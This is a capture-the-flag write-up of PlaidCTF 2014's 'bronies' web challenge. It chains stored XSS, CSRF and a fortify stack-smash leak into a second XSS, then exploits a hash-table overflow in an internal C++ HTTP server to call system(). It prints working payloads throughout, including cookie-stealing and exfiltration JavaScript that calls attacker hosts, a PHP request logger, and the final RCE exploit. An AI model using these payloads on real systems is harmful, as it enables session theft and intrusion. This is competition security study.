plaidCTF 2014 - bronies (web800)

For PlaidCTF2014, Eindbazen and fail0verflow joined forces as 0xffa, the Final Fail Alliance.
Don't miss out on other write-ups at Eindbazen's site!
bronies
Web (800 pts)
-------------------
We are trying to break into eXtreme Secure  Solutions, where The
Plague works as a system adminstrator.  We have found that their
internal company login page is at
http://portal.essolutions.largestctf.com/. Recon has also revealed
that  The Plague likes to browse this site during work hours:
http://54.196.225.30/ using the username ponyboy2004.  Remember, our
main target is to break into the company portal, *not* the pony site.

Captcha, Ponies & XSS

Alright, The Plague, it’s time for a final blow to the face. This challenge was worth a whopping 800 points and divided in two parts. We were determined in solving this beast, so here’s how we did it.

The part most people probably had zero problems with was finding an XSS vulnerability on the ponies website. You can send messages to other bronies and the message field is prone to free-form XSS. This can be done by sending a message with some HTML code in the message body to your own account and viewing it. There was something annoying that had to be done for every message you wanted to send though: pass a captcha. Not just any captcha, this one displays a picture of one of the main(?) characters from the My Little Ponies series.

Our strategy for passing this captcha was somewhat saddening: keep refreshing till we get the picture for ‘Rarity’, then submit with ‘Rarity’ in the captcha field. I still regret this approach as we needed to keep doing this step till the very last step of this bronies challenge. It would have taken a little effort to automate this and have a lookuptable to match whether we’re dealing with Apple Jack, Fluttershy, Pinkie Pie and whatever the other ponies are called.

XSS to Memory Corruption

Ok, next we of course tried to attack the plague’s ponyboy2004 persona in order to steal his cookie. This proved to be easy and we could nab his cookie… but the goal of the challenge is to break into the portal, the ponies website is just a launchpad… So what can we do on the portal site?

The portal page presents us with a login form that HTTP POST to /login.php, there’s 3 fields: username, password and OTP. We have none. Fuzzing these fields manually a bit yielded an interesting bit of information… if we supply a long value for the OTP field we get some interesting output:

*** stack smashing detected ***: ./checkotp terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xf7540980]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xeb92a)[0xf754092a]
./checkotp[0x8048aa6]

So it looks like there is a buffer overflow in the checkotp binary, something which is invoked by the login.php script. This is also the moment we learned there was something like the checkotp binary at all. So we proceeded to download it by accessing http://portal.essolutions.largestctf.com/checkotp directly. Can we reliably exploit this buffer overflow? Maybe there’s other bugs in checkOTP? Was this the intended solution?

If we can exploit checkotp then what good is the ponies website XSS? Many questions. Some members worked on reversing the checkotp binary while others tried to get their creative juices flowing… The checkOTP binary basically accepts the three fields on stdin separated by newlines (0x0a) We tried for a bit to exploit the buffer overflow to get code execution, and RE’d harder to find other usable bugs. Then something clicked, someone recalled a bugtraq posting by Dan Rosenberg.

This bugtraq post discusses a method to turn fortify into an attacker aid and use it to leak strings into the error output it prints. If we can manage to overwrite the argv[0] pointer we can leak any string for which we know the address.

Memory Corruption to XSS

Reversing taught us that there was not many useful “secret” stuff to be leaked here, but what if we leak our own input again? Would that help us? Yes it would! We can then turn this into another XSS vulnerability in login.php to escalate our XSS-privileges to another domain from the context of The Plague’s webbrowser.

From reversing we learned there’s a nice static address at which our input password lives [0x0804a040], but there’s one small catch though… it gets memfrob()’d into that output buffer, not a biggie. All memfrob does is XOR every byte with 0x2a (42 decimal), so it’s only a small hurdle along the way. After some manual fuzzing we found the right position for the argv[0] pointer. We can verify our theory works by doing the following:

$ OVERFLOW=`perl -e 'print "A"x509 . "\x40\xa0\x04\x08";'`
$ URL='http://portal.essolutions.largestctf.com/login.php'
$ curl -d "username=AA&password=ABABBABBB&otp=$OVERFLOW" "$URL"
<body>
<h1>Login status</h1>
<ul>
*** stack smashing detected ***: khkhhkhhh  terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xf7517980]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xeb92a)[0xf751792a]
khkhhkhhh [0x8048aa6]

As you can see our memfrob()’d password string (ABABBABBB->khkhhkhhh) does indeed appear in the output. Time to leverage this fact for another XSS attack, but this time against the portal domain, we’re slowly getting there. >:-)

Ok, let’s set up a CSRF attack against the portal login using some simple HTML and javascript magic:

HTML:

<html>
<body>
<form action="http://portal.essolutions.largestctf.com/login.php" method="post" id="frm">
<input type="hidden" name="username" id="username" value="AA" />
<input type="hidden" name="password" id="password"/>
<input type="hidden" name="otp" id="otp"/>
</form>
<script>
...
</script>
</body>
</html>

Javascript (inserted into script block in the above HTML):

// simple document.getElementById wrapper
function obj(id) {
        return document.getElementById(id);
}

// thanks stackoverflow.com :-)
String.prototype.repeat = function( num ) {
    return new Array( num + 1 ).join( this );
}

// Pointer to memfrob()'d pass [0x0804a040]
frobbed_password = unescape("%40%A0%04%08");

evil_html = "<script\tsrc='http://ourdomain.tld/a.js'></script>";
frobbed_html = "";

for(i = 0; i < evil_html.length; i++) {
        frobbed_html += String.fromCharCode(evil_html.charCodeAt(i) ^ 42);
}

obj('password').value = frobbed_html;
obj('otp').value = "A".repeat(509) + frobbed_password;

// submit the form to conduct the CSRF-to-memcorruption-to-XSS attack
obj('frm').submit();

This page was hosted on our machine as ‘c.html’, in order to get The Plague to run this HTML code we submitted a basic XSS on the ponies page in the form of:

<script>document.location='http://ourdomain.tld/c.html';</script>

A small detail of the evil_html payload is that we use a tab "\t" character instead of a regular space. Why? Because 0x20 xor 42 = 0x0a, and the checkotp binary gets fed the POST variables on 3 separate lines on the stdin, and this would confuse it and terminate the entered OTP value early, something we don’t want. :-)

This way we had an easy payload we could keep copy pasting into the message box whenever we wanted to retrigger it, and edit the HTML/JS code on the server as needed. The second XSS stage we inject into the portal domain is another script tag which will load a.js from our box. Using a.js we were quickly able to steal The Plague’s portal cookie using a simple payload like this:

new Image().src="http://ourdomain.tld/xss/?"+escape(document.cookie);

In /xss we had set up a basic GET/POST logger (yes, in PHP, sorry..):

<?php
$data = "=== REQUEST FROM [".$_SERVER['REMOTE_ADDR']."] ";
$data .= "-> ".date("Y-m-d : H:i:s")."\n";
$data .= "GET:\n".var_export($_GET, true)."\n";
$data .= "POST:\n".var_export($_POST, true)."\n";
$data .= "COOKIE:\n".var_export($_COOKIE, true)."\n";
$data .= "SERVER:\n".var_export($_SERVER, true)."\n\n";

file_put_contents("log.txt", $data, FILE_APPEND);
?>

Basically a simple stub to log as much info as possible about a request, your bog standard XSS-logging-jar, if you will.

This way we were able to retrieve The Plague’s cookie in our XSS logger and hijack his session on the Portal Domain. This gives us the first flag:

$ COOKIE="PHPSESSID=piaeeg5uhhsn7m380ggn0jeoe1"
$ curl -b "$COOKIE" "http://portal.essolutions.largestctf.com"          
<!doctype html>
<html>
    <head>
    <title>
        eXtreme Secure Solutions Internal Portal
    </title>
    </head>
    <link rel="stylesheet" type="text/css" charset="utf-8" media="all" href="/style.css">
    <body>
    <div id="box">
        <h1>eXtreme Secure Solutions Internal Portal</h1>
        <div id="notice">
            Flag #1: xss_problem_is_web_problem<br>
            This challenge has one more flag.  Break into the internal server to capture it!
        </div>
        <p>
            You are logged in as ebleford.
        </p>
        <p>
            Reminder: For security reasons, all internet traffic is blocked on the Bigson.
        </p>
        <p>
<script>
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://bigson.essolutions.largestctf.com/status', false);
    xhr.send(null);
    if (xhr.responseJSON["status"] == "ok") {
        document.write('The Bigson is up!');
    } else {
        document.write('The Bigson is down!');
    }
</script>
        </p>
        <ul id="menu">
            <li><a href="http://bigson.essolutions.largestctf.com/index?file=index.html">The Bigson</a></li>
            <li><a href="/logout.php">Logout</a></li>
        </ul>
    </div>
    </body>
</html>

Flag xss_problem_is_web_problem concludes ‘part #1’ of the bronies task, netting us 300 points. Phew.

Attacking the bigson

Alright, we have a way to break into the portal domain now. In the HTML code of the index we find a piece of javascript which sets up an XMLHttpRequest (XHR/AJAX) request to http://bigson.essolutions.largestctf.com/status. There’s also a link to a page on bigson : http://bigson.essolutions.largestctf.com/index?file=index.html. Unfortunately, bigson.essolutions.largestctf.com resolves to an IP address in a private range, so we cannot directly attack the webserver running on the machine. So we did what we have been doing so far once again: leverage the Plague’s Webbrowser to make these requests for us.

$ host bigson.essolutions.largestctf.com
bigson.essolutions.largestctf.com has address 10.15.0.5

We started by writing a new piece of javascript that we could use to exfiltrate responses from the internal bigson webserver back to our internet-facing XSS logger.

function reqListener () {
        new Image().src="http://ourbox.tld/xss?code="+oReq.status;

        var arrayBuffer = oReq.response;
        data="";
        if (arrayBuffer) {
                var byteArray = new Uint8Array(arrayBuffer);
                for (var i = 0; i < byteArray.byteLength; i++) {
                        b = byteArray[i].toString(16);
                        if (b.length==1) b = "0"+b;
                        data += b;
                }

                document.write("<form method=post action=http://ourbox.tld/xss/?data=FORM_TEST id=frm><input type=hidden name=hax value=\"" + data + "\"></form>");
                document.getElementById('frm').submit();
        }

}

var oReq = new XMLHttpRequest();
oReq.onload = reqListener;
oReq.responseType = "arraybuffer";
oReq.open("get", "http://bigson.essolutions.largestctf.com/status", true);

This code is pretty simple: it will set up an XHR request to http://bigson.essolutions.largestctf.com/status, and register reqListener as a handler function for any status changes in the XHR request. The reqListener function starts by feeding back the HTTP status code as a GET param to our XSS logger. After that we turn the response to the XHR request into an ArrayBuffer, and from there we convert it to an enumerable UInt8Array to turn it into an ASCII hex string for our convenience. The ASCII hex string is then relayed back once again to our XSS logger as a POST variable (to avoid length limitations of the GET query string).

Of course we quickly started playing around with /index?file=index.html and noticed this endpoint gave us a Local File Disclosure primitive. After dumping /etc/passwd and trying out some guesses for the flag filename we took a deep breathe and realized: Yep, they want us to own the internal webserver. Dumping out /proc/self/cmdline taught us where the binary for the webserver lived. Doh, turns out it’s just ./bigson. After refining the exfiltration script a bit (The javascript code you can see above is the “final” version, the first version didn’t handle binary/long data too gracefully ;-)) we managed to dump out the bigson ELF binary.

It’s time to reverse and pwn this binary at an inhuman speed since there’s only a few hours left before the end of pCTF… Better call in some reinforcements! And who else but a real pony would be fit for such a task? ;-)

Peering in

comex here - this was where I took over. Since reading a fixed filename wasn’t enough to find the flag, I had to exploit bigson.elf to get code execution. I popped it in IDA and, well, it was C++:

...
Dispatcher::Dispatcher(void)
Dispatcher::~Dispatcher()
Dispatcher::Dispatch(int)
Dispatcher::AddHandler(std::string const&,void (*)(std::string const&,HttpRequest const&,HttpResponse *))
std::forward<HashFunction *&>(std::remove_reference<HashFunction *&>::type &)
std::forward<std::default_delete<HashFunction>>(std::remove_reference<std::default_delete<HashFunction>>::type &)
std::_Head_base<1ul,std::default_delete<HashFunction>,true>::_Head_base<std::default_delete<HashFunction>,void>(1ul &&)
...

Thanks to templates and virtual methods, among other things, object code compiled from C++ tends to look ugly and include a lot of indirection - combined with a binary compiled for x86-64, which the Hex-Rays decompiler is not yet compatible with, my first reaction was to groaned a bit. But this was misplaced; having full symbols more than makes up for the annoyance. I don’t need to care what the STL function std::_Head_base<1ul, std::default_delete<HashFunction>,true>:: _Head_base<std::default_delete<HashFunction>, void>(1ul &&) does if the calls to it are buried inside other library functions with saner names, and when dealing with non-library code, C++ symbols have the advantage over C of containing parameter types. Plus, once I started looking at the code, it became apparent that the binary was compiled with a low optimization level, avoiding inlining and keeping variables in stack slots and other things that made the assembly quite easy to read (at the cost of producing woefully inefficient code).

The outer loop

Anyway, there wasn’t that much functionality, so I went through it all. When the program is started up, it becomes a forking server, with a loop to accept a HTTP connection, fork, and call a drop_privs function before handling the connection. From that, two things stood out:

  1. Since all child processes are forked from a single master process, all memory addresses remain the same between requests. With the ability to ask the program to read /proc/self/maps, ASLR became a non-issue.

  2. I was somewhat suspicious of drop_privs being called after forking, because there is an easy-to-make mistake when dropping privileges: if the return value of setuid wasn’t checked, the process could end up reading files as root rather than the specified user bigson. But the return value is indeed checked, so false alarm.

Moving on, the handle function just calls Dispatch(int) on a static instance of Dispatcher. OOP at its best! That method creates an HttpRequest and HttpResponse on the stack, calls ReadFrom(int) (supplying the socket) and Parse() on the HttpRequest, and looks up the Request’s path() in a global std::map to get a function pointer to handle the requested URL. It calls the function with the Response object as an argument, which should fill it out, and finally SendTo on the Response, passing the socket again.

My next step was to look at the available request handlers. However, there were only two: /index, which implements the aforementioned arbitrary file read, and /status, which just returns the fixed JSON data {"status": "ok"}. Both handlers are straightforward, so any further bugs would have to be found in the parsing logic.

Request parsing

Looking at the HttpRequest constructor, it constructs a number of fields: a std::unique_ptr<char []>, three std::strings, a std::map, and a HashTable. The latter was an immediate alarm bell: there have been two uses of std::map so far, yet for one particular field, the author decided to implement their own hash table? Hmm…

But I was going through the logic in order, so first I looked at that ReadFrom method. It’s a standard loop that repeatedly calls recv to receive a total of up to 0x1000 bytes into the aforementioned unique_ptr (which was initialized with a 0x1000 byte buffer), stopping when the buffer is full or \r\n\r\n is found in the input, signifying the end of the HTTP request. With one catch: the check for \r\n\r\n is with strstr, a C library function that expects null terminated strings, yet there is no null termination! If the input data is long enough, strstr could read past the end of the buffer and into whatever is allocated afterwards on the heap. Reading isn’t actually useful, but it’s the start of a pattern of treating the buffer as a C string that continues into the Parse method. That method makes a few calls to strsep, which modifies the string to replace the separator with a null character: without a terminator at the end of the buffer, strsep could seek past it and overwrite some data later in the heap.

Unfortunately, at this point, because this read loop is the first time input data is read from the current socket, while fork isolates separate requests, we have no control over the heap layout whatsoever. Plus, changing the first instance of a fixed character in a string to zero is a pretty limited effect: there would have to be no null bytes between the end of the buffer and some important value, the important value would have to contain the character, and changing it to zero would have to do something useful rather than just crashing. It’s possible that the heap was arranged just right to make this work, but I doubted it. So I moved on and searched for other bugs.

The mysterious HashTable

Let’s go back to the HashTable instance. It turns out to be used for query parameters, like /foo?a=b&c=d, while the map is used for HTTP headers. It seems to use a class called PHPHash… what’s that again?

Oh. That hash.

The hash table size seems to be fixed, 0x100 or 0x101, not quite sure; former would make more sense but struct looks like the latter. We can easily tell by checking the part where the implementation reduces the hash modulo the table size, to determine which bucket to use. Where is it?… I can’t find it in HashTable::Lookup, so it has to be built into the hash function: either HashTable::Hash or the method it delegates to, PHPHash::operator(). But there’s no modulo in either of those places! There is no reduction: if the hash is bigger than the table size, it will just index out of bounds. If the program tries to insert a key with such a hash, there will be a wild write.

For normal hash functions, which use shifts and multiplication and the like, this would almost certainly be detected during development, since most keys would happen to hash to large values. But with PHPHash, aka strlen, normal keys will hash to small values which are less than the table size.

What exactly can we do with this? The hash table algorithms are something like (pardon my syntax):

struct HashEntry:
    std::string value
    std::string key
    HashEntry *next

void HashTable::Insert(std::string key, std::string value):
    HashEntry *he = Lookup(key)
    if he == NULL:
        he = this->buckets[Hash(key)] = new HashEntry(key)
    he->value = value

HashEntry *HashTable::Lookup(std::string key):
    bucket = this->buckets[Hash(key)]
    while bucket && bucket->key != key:
        bucket = bucket->next
    return bucket

The HashTable is on the stack, so there are many important stack slots to choose from at fixed offsets, unlike the less predictable heap. However, we can’t just write arbitrary data into the stack; the overflowing buffer is an array of HashEntry *, and before Insert even gets to the writing part, it calls Lookup, which reads the old data and, unless it’s null, calls std::string::operator == on bucket->key. For this not to crash, bucket (the contents of the stack slot) has to be a valid pointer, and operator== can’t crash. For the latter, assuming the usual glibc implementation of strings - the string object consists of a pointer to the string data, and the metadata (length, refcount) is stored at a negative offset in the same buffer - this just means bucket->key (aka *(bucket + 8)) also has to be a valid pointer.

However, most interesting stack slots won’t be zero and probably won’t satisfy this double pointer constraint. Some might remain, but there’s actually a more obvious option than spelunking all the way up the stack.

HashFunction

The hash table is set up to dynamically accept multiple hash functions: even though the constructor always initializes a PHPHash, it stores the pointer into a std::unique_ptr<HashFunction>, a pointer to the superclass, and calls a virtual method to do the actual hashing. This pointer “just so happens” to be stored right after the buckets array at the end of the class layout, and if we overwrite it with a HashEntry, the memory layout will look like:

          Intended                Actual
          --------                -------
bucket    HashFunction *          HashEntry *
deref ->  vtable pointer          std::string value, aka pointer to string contents
deref ->  virtual method pointer  arbitrary data from string

So to have future hash calls jump to an arbitrary address, we just have to put the address at the right offset in the value of our query parameter and make the key exactly 257 bytes long. (By the way, because we can only access this server indirectly, through XMLHTTPRequest in an XSSed browser, it might not be possible to stick binary data directly into the HTTP request. But also conveniently, the key and value strings are URL decoded before this point, so we can just use the normal %-escapes.) As ASLR was already defeated, we can pick any address in an executable segment from this binary or any of the libraries that got loaded into its address space.

Perhaps system from libc? For this virtual call, rsi, the second argument in the x86-64 calling convention, is a C string containing the key to be hashed - that is, since the hashing for the too-long key is already done before the overwrite, each following key in the request, which can be anything. Nice, but rdi, the first argument, is ‘this’, the HashFunction * a.k.a. HashEntry *; this pointer will start with zeroes, so it’s not a valid C string. I don’t know any libc functions that take a shell command as the second argument, so a bit more work was needed.

Actually, I’m not sure what was expected here; based on the smoothness of the preceding steps, I imagine there might be some elegant function we can jump directly to to do interesting things with the key. In lieu of that, I solved it by finding a simple gadget in libc, which executes the following instructions, among other harmless ones:

  • mov 0x8(%rdi),%rdi: since rdi is HashEntry *, *(rdi + 8) will contain the corresponding key - for the first, overflowing query parameter, not the current one being hashed.
  • callq *0xd8(%rax): rax is not generally well defined on entry to a function, but at that point in yo.elf, the compiler’s register allocation happens to leave the current key in rax as well as rsi.

So the address to jump to is loaded from the current key, and the first key is used as the first argument. For the former we can now use the address of system, making the latter the command. This constrains the command to be exactly 257 characters long, but there was no need for especially long commands, and comment characters could be used to pad up to 257, so it was suitable.

As soon as we started testing this, Ricky, one of the CTF organizers and author of this challenge, noted on IRC that we were close to solving the puzzle, probably because he saw stderr output from the commands. This was a neat little side channel: we hadn’t gotten the response to work correctly yet (and were running out of time!), but the message all but confirmed that the choice of command was the issue rather than the memory corruption steps.

Last steps

The server did not have any direct Internet access, so it was necessary for this shell command to exfiltrate data via a valid HTTP response issued through the socket. The file descriptor was passed through system to bash, so it was just a matter of echoing a basic HTTP OK (plus the Access-Control-Allow-Origin header) to a specific file descriptor number, echo [etc...] >&4.

Why 4? File descriptors are assigned in order, so the number used for the socket just depends on what operations libc performs. Since I didn’t feel like getting all the libraries to actually run that libc locally (I tested by running the binary with my system’s libc), we just guessed.

I wonder whether the null termination issue was intentional.

Final Exploit

Our final exploit looked more or less like the snippet below. The original final exploit we made was a huge iterative mess, as usually happens when your pressed for time during a CTF, so this one was slightly edited so it becomes a bit more readable. Various commands were tried iteratively, and the fd number used on the server was found using some manual bruteforcing.

function reqListener () {
        new Image().src="http://ourbox.tld/xss?code="+oReq.status;

        var arrayBuffer = oReq.response;
        data="";
        if (arrayBuffer) {
                var byteArray = new Uint8Array(arrayBuffer);
                for (var i = 0; i < byteArray.byteLength; i++) {
                        b = byteArray[i].toString(16);
                        if (b.length==1) b = "0"+b;
                        data += b;
                }

                document.write("<form method=post action=http://ourbox.tld/xss/?data=FORM_TEST id=frm><input type=hidden name=hax value=\"" + data + "\"></form>");
                document.getElementById('frm').submit();
        }

}

String.prototype.repeat = function( num ) {
    return new Array( num + 1 ).join( this );
}

var oReq = new XMLHttpRequest();
oReq.onload = reqListener;
fdnum="4";

turl = "http://bigson.essolutions.largestctf.com/status?";
cmd = "/bin/echo -en \"HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: *\r\n\r\n\" >&"+fd_num+";";
cmd += "cat  /home/bigson/really_weirdly_named_key_haha >&"+fd_num+" #";

query_string = cmd;
query_string += "B".repeat(251 - len(cmd));
query_string += "=ABCDEFGHIJKLMNOPQRSTUVWX";

query_string += "\x44\xc7\x6f\x7a\x8b\x7f\x00\x00"; // 0x7f8b7a6fc744
query_string += "YZ1234567890&" + "C".repeat(216);
query_string += "\x80\x9f\x62\x7a\x8b\x7f\x00\x00"; // 0x7f8b7a629f80
query_string += "=";

oReq.open("get", turl + escape(query_string), true );

oReq.responseType = "arraybuffer";
oReq.send();

And at last WEB_you_hacked_the_bigson_WEB \o/

Closing Words

We hope you enjoyed reading this writeup as much as we did solving this two-fold task. Never would we have imagined a scenario where you apply XSS to get CSRF, to get Memory corruption based XSS, to get access to an internal network where you again can leverage memory corruption against a custom HTTP daemon in order to get to that golden egg: the final flag. Oh, and of course all while maintaining a strategy for data exfiltration which relied solely sneaking things back out using HTTP requests made by The Plague’s webbrowser. :-)

Thanks to Ricky (author of the bronies task) and the rest of the PPP team for this amazing task and excellent CTF!